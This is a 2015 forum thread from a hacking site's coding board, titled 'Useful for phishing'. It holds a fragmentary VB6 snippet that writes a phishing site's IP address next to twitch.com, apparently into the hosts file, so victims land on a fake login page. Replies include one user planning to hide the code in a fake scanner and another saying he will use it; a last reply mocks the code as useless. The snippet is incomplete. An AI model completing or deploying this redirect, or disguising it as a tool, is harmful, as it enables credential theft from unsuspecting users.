![]() |
|
Useful for phishing - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: Useful for phishing (/Thread-Useful-for-phishing) |
Useful for phishing - samaritan - 03-09-2015 Option Explicit Dim Text As String Text = (vbNewLine & "phishingsiteip twitchwebsiteurl") ' Here above you can add more sites that will be filtered / redirected ' Note: you need dedicated IP on your phishing website to make this work. ' example: (vbNewLine & "121.124.42.1 twitch.com") the IP will be the dedicated IP of your phishing website. Print #1, Text Close #1 End Sub ' you can make this also for other websites. RE: Useful for phishing - 9gag - 03-09-2015 Awesome. i'll make a fake scanner that runs this code. Is it vb6? RE: Useful for phishing - THC - 03-16-2015 Thanks for this holy heck, Im going to actually use this RE: Useful for phishing - bitm0de - 05-15-2015 This is more useless than the hello world program. |